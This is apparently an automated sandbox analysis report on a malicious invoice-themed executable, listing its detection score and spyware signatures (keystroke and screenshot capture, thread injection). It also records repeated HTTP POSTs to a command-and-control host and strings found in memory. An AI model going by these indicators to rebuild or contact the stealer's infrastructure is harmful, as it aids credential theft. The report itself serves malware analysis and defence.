Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:549628
Start time:14:48:31
Joe Sandbox Product:Cloud
Start date:07.05.2018
Overall analysis duration:0h 24m 2s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:facture_1398665.exe
Cookbook file name:frenchkeyboardlayout.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.phis.spyw.troj.winEXE@17/110@2/1
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 168
  • Number of non-executed functions: 300
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Set French Keyboard Layout (default)
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): sppsvc.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshotsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00434448 GetObjectW,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,3_2_00434448
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0045C584 GetKeyboardState,3_2_0045C584

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 0Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 9Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 0Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 458Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 35Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_003824E9 InternetOpenA,InternetConnectA,InternetSetOptionA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,6_2_003824E9
Found strings which match to known social media urlsShow sources
Source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmpString found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.apps equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.business equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.code equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.developers equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.m equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.mbasic equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.mtouch equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.pixel equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.research equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.secure equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.touch equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.upload equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.facebook.www equals www.facebook.com (Facebook)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.twitter equals www.twitter.com (Twitter)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.twitter.www equals www.twitter.com (Twitter)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.edit equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.login equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.mail equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.at equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.br equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ca equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ch equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.chfr equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.chit equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.cl equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.co equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.de equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.dk equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.en-maktoob equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.es equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.espanol equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.fi equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.fr equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.gr equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.hk equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.id equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.in equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.it equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.maktoob equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.malaysia equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.mx equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.nl equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.no equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.pe equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ph equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.pl equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.qc equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ro equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ru equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.se equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.sg equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.th equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.tr equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.tw equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.uk equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.ve equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: com.yahoo.search.vn equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: iecompat:fantasysports.yahoo.com equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: iecompat:maktoob.yahoo.com equals www.yahoo.com (Yahoo)
Source: bhv57BC.tmp.12.drString found in binary or memory: iecompat:touch.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: truand-2-la-galere.money
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 0Cache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: bhv57BC.tmp.12.drString found in binary or memory: file:///C:/Users/user/Desktop/CHIP_Update_pack_32bit.zip
Source: bhv57BC.tmp.12.drString found in binary or memory: file:///C:/jbxinitvm.au3
Source: bhv57BC.tmp.12.drString found in binary or memory: file://192.168.1.2/all/customscript.au3
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://
Source: bhv57BC.tmp.12.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: firefox.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: firefox.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: firefox.exe.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: firefox.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: firefox.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: firefox.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmpString found in binary or memory: http://g
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XAzH.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XAzH?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42rRY.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42rRY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdgjI6.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdgjI6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAfZrQ8.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAfZrQ8?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAlLhfN.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAlLhfN?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WFKz.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WFKz?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WgdR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WgdR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H.img?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBj0TsQ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBj0TsQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvEQ3h
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvEQ3h.img
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvF85g
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvF85g.img
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvrNFC
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvrNFC.img
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBwZC85.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBwZC85?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0CXa.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0CXa?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0K26.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0K26?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
